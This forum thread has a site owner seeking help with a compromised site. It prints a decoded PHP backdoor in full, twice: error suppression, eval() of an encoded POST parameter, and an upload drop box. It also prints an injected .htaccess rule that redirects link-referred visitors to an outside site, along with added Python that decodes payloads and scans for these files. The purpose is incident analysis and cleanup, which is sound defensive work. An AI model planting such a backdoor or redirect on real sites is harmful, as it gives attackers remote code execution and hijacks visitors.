Help me identify this attempt to hijack my site.

Any off topic discussions should go in this forum. Post count is not increased by posting here.
Archive Access status is required to post in this forum. Find out how to get it
pizzaboy192
Posts: 2688
Joined: Thu Oct 23, 2008 3:25 am
Location: Earth.

Help me identify this attempt to hijack my site.

Post by pizzaboy192 »

Hello all.
I had an attempt this morning to try and hijack my site. Luckily some users pointed it out before too many problems were had.
I've zipped up the file that had decided to spread onto my site, and was slowly injecting itself into every directory that it could get its hands onto.
it's available at: http://pizzaboy192.com/default.zip
It's just a default.php file. It's small and I can't make heads or tails of it.

Thanks.

Pwned
Donator
Posts: 4268
Joined: Sat Aug 22, 2009 4:28 pm

Re: Help me identify this attempt to hijack my site.

Post by Pwned »

I decoded it, and that's what it looks like:

<?php
@error_reporting(0);           // silence every error so failures leave no trace
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r'])) {
    print $_GET['r'];          // liveness check: reflect ?r= back to the caller
} elseif (isset($_POST['e'])) {
    // remote code execution: peel the layered encoding and eval() the result
    eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
    // drop box: append the raw request body, base64-encoded, to 'tmpfile' beside the script
    $data = file_get_contents('php://input');
    if (strlen($data) > 0) print 'STATUS-IMPORT-OK';
    if (strlen($data) > 12) {
        $fp=@fopen('tmpfile','a');
        @flock($fp, LOCK_EX);
        @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
        @flock($fp, LOCK_UN);
        @fclose($fp);
    }
}
exit;
Here are some mentions of it. Apparently this was made by Russians: http://wordpress.org/support/topic/cant ... ing-trojan
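
The decoded script has three entry points: a reflected ?r= liveness check, an eval() of a layered-encoded POST parameter, and a drop box that logs uploaded bodies to a file called tmpfile. The Python below is an added example for whoever has to clean this up (it is not code from the original post or from the malware): it undoes the encoding chain so a captured $_POST['e'] from the access logs or a request capture can be read, parses the tmpfile drop box, and flags other copies of the script in a web root. The sample payload and tmpfile line are constructed here; the "generic" markers are an assumption about how the packed default.php the poster zipped (not shown on the page) might look.

```python
"""Responder helpers for the decoded PHP backdoor above (added example, not part of the
original post). Sample inputs are constructed, not captured from the poster's server."""
import base64
import codecs
from pathlib import Path
from typing import List, Optional, Tuple

# Strings taken verbatim from the decoded script; other decoded copies should contain them.
EXACT_MARKERS = (
    "eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13(",
    "STATUS-IMPORT-OK",
)
# Assumption: the dropper on disk was packed as eval() of some decoder; this is a heuristic
# for that form, which the page itself does not show.
GENERIC_MARKERS = ("eval(base64_decode(", "eval(gzinflate(", "eval(str_rot13(", "eval(strrev(")


def rot13(s: str) -> str:
    return codecs.encode(s, "rot_13")   # same letter-only mapping as PHP's str_rot13


def decode_e_parameter(e: str) -> str:
    """Undo, innermost first, the chain the backdoor applies before eval():
    str_rot13 -> base64_decode -> strrev -> str_rot13 -> base64_decode."""
    step = rot13(e)
    step = base64.b64decode(step).decode("latin-1")
    step = step[::-1]
    step = rot13(step)
    return base64.b64decode(step).decode("utf-8")


def encode_e_parameter(php: str) -> str:
    """Exact inverse of decode_e_parameter; used only to build the constructed sample."""
    step = base64.b64encode(php.encode("utf-8")).decode("ascii")
    step = rot13(step)
    step = step[::-1]
    step = base64.b64encode(step.encode("latin-1")).decode("ascii")
    return rot13(step)


def parse_tmpfile(text: str) -> List[Tuple[str, bytes]]:
    """The 'binary' branch appends one 'REMOTE_ADDR<TAB>base64(body)\\r\\n' record per
    upload; return (ip, raw body) pairs so the responder can see what was pushed in."""
    records = []
    for line in text.splitlines():
        if "\t" not in line:
            continue
        ip, b64 = line.split("\t", 1)
        records.append((ip.strip(), base64.b64decode(b64.strip())))
    return records


def looks_like_backdoor(text: str) -> Optional[str]:
    """Return 'exact' for the decoded script, 'generic' for eval-of-decoder code, else None."""
    compact = "".join(text.split())   # ignore whitespace a packer may have inserted
    if any(m in compact for m in EXACT_MARKERS):
        return "exact"
    if any(m in compact for m in GENERIC_MARKERS):
        return "generic"
    return None


def scan_web_root(root: Path) -> List[Tuple[Path, str]]:
    """Walk a web root and report PHP files that match either marker set."""
    hits = []
    for path in root.rglob("*.php"):
        try:
            verdict = looks_like_backdoor(path.read_text(errors="ignore"))
        except OSError:
            continue
        if verdict:
            hits.append((path, verdict))
    return hits


# Constructed samples (hypothetical; not taken from the poster's server).
SAMPLE_PHP = 'echo "constructed sample";'
SAMPLE_POST_E = encode_e_parameter(SAMPLE_PHP)
SAMPLE_TMPFILE = "203.0.113.7\t" + base64.b64encode(b"uploaded-bytes").decode() + "\r\n"

if __name__ == "__main__":
    print("decoded e :", decode_e_parameter(SAMPLE_POST_E))
    print("tmpfile   :", parse_tmpfile(SAMPLE_TMPFILE))
    print("verdict   :", looks_like_backdoor(
        "eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));"))
```

Two things worth checking after a cleanup: a file named tmpfile next to any copy of the script (its contents tell you what was uploaded and from where), and the access log for POSTs with a Content-Encoding: binary header or an e= body, which decode_e_parameter turns back into the PHP that was run.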

pizzaboy192
Posts: 2688
Joined: Thu Oct 23, 2008 3:25 am
Location: Earth.

Re: Help me identify this attempt to hijack my site.

Post by pizzaboy192 »

Pwned wrote: I decoded it, and that's what it looks like:

<?php
@error_reporting(0);           // silence every error so failures leave no trace
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_GET['r'])) {
    print $_GET['r'];          // liveness check: reflect ?r= back to the caller
} elseif (isset($_POST['e'])) {
    // remote code execution: peel the layered encoding and eval() the result
    eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
    // drop box: append the raw request body, base64-encoded, to 'tmpfile' beside the script
    $data = file_get_contents('php://input');
    if (strlen($data) > 0) print 'STATUS-IMPORT-OK';
    if (strlen($data) > 12) {
        $fp=@fopen('tmpfile','a');
        @flock($fp, LOCK_EX);
        @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
        @flock($fp, LOCK_UN);
        @fclose($fp);
    }
}
exit;

Here are some mentions of it. Apparently this was made by Russians: http://wordpress.org/support/topic/cant ... ing-trojan

Ah. WordPress issue. I had an old install tucked away. Time to remove that directory, and secure my other install.

EDIT: Found this little gem in the .htaccess file in my /wordpress/ directory.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://darwinawards.fr/wami.html?h=1318607 [L,R]
</IfModule>
The humor being that I run IIS. .htaccess is useless.
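
The injected .htaccess block is a conditional redirect: the first RewriteCond only matches when an http:// Referer header is present, so a visitor who types the address in directly (or the site owner checking his own pages) is never redirected, while anyone arriving from a link or a search result is bounced to the darwinawards.fr URL. The Python below is an added example, not code from the original post: it emulates the two RewriteConds exactly as written on the page and shows who gets redirected, then scans .htaccess text for RewriteRules that redirect to an absolute URL behind a Referer check. The request headers and the clean WordPress .htaccess are constructed samples; pizzaboy192.com is used as the host name only because it appears earlier in the thread.

```python
"""Emulation of the injected .htaccess rule above and a finder for rules of that shape
(added example; not from the original post). Sample headers are constructed."""
import re
from typing import List, Optional, Tuple

# The two RewriteCond patterns and the RewriteRule target, copied from the injected block.
REFERER_COND = re.compile(r"^http://[w.]*([^/]+)")
HOST_COND = re.compile(r"^[w.]*([^/]+)/$", re.IGNORECASE)   # [NC]
REDIRECT_TARGET = "http://darwinawards.fr/wami.html?h=1318607"


def rewrite_decision(http_host: str, referer: Optional[str]) -> Optional[str]:
    """Return the URL the visitor is sent to, or None when the rule does not fire.
    mod_rewrite evaluates the RewriteConds in order; %1 is the group captured by the
    first one, and the leading '!' on the second negates its match."""
    m = REFERER_COND.match(referer or "")      # no Referer, or an https:// one: cond fails
    if not m:
        return None
    test_string = f"{http_host}/{m.group(1)}"  # %{HTTP_HOST}/%1
    if HOST_COND.match(test_string):           # pattern matched, so '!' makes the cond false
        return None
    return REDIRECT_TARGET


RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
COND_REFERER_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)


def find_absolute_url_redirects(htaccess: str) -> List[Tuple[str, bool]]:
    """Report RewriteRules whose target is an absolute http(s) URL with an R flag, and
    whether a RewriteCond on HTTP_REFERER guards them (the 'only via links' trick)."""
    findings = []
    referer_guarded = False
    for line in htaccess.splitlines():
        if COND_REFERER_RE.match(line):
            referer_guarded = True
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), (m.group(3) or "")
        flag_list = [f.strip().upper() for f in flags.split(",") if f.strip()]
        is_redirect = any(f == "R" or f.startswith("R=") for f in flag_list)
        if is_redirect and re.match(r"https?://", target, re.I):
            findings.append((target, referer_guarded))
        referer_guarded = False   # RewriteConds apply only to the next RewriteRule
    return findings


# The block from the post, verbatim, and a constructed stock WordPress block for contrast.
INJECTED_HTACCESS = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://darwinawards.fr/wami.html?h=1318607 [L,R]
</IfModule>"""

CLEAN_HTACCESS = """RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]"""

# Constructed visits (hypothetical headers).
SAMPLE_VISITS = [
    ("pizzaboy192.com", None),                               # typed in directly
    ("pizzaboy192.com", "http://www.google.com/search?q=x"),  # from a search result
    ("pizzaboy192.com", "http://pizzaboy192.com/wordpress/"), # internal navigation
    ("pizzaboy192.com", "https://www.google.com/"),           # https referer
]

if __name__ == "__main__":
    for host, ref in SAMPLE_VISITS:
        print(f"{ref!s:42} -> {rewrite_decision(host, ref)}")
    print(find_absolute_url_redirects(INJECTED_HTACCESS))
    print(find_absolute_url_redirects(CLEAN_HTACCESS))
```

Running it shows the owner-blind spot: a direct visit is never redirected, but every http:// referer is, including the site's own pages, because the second condition as written (ending in /$) can never match the HTTP_HOST/%1 string and its '!' therefore always succeeds. The emulation covers only these two patterns, not mod_rewrite in general; to see what a real visitor sees, request the page with a Referer header set rather than from the browser's address bar.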
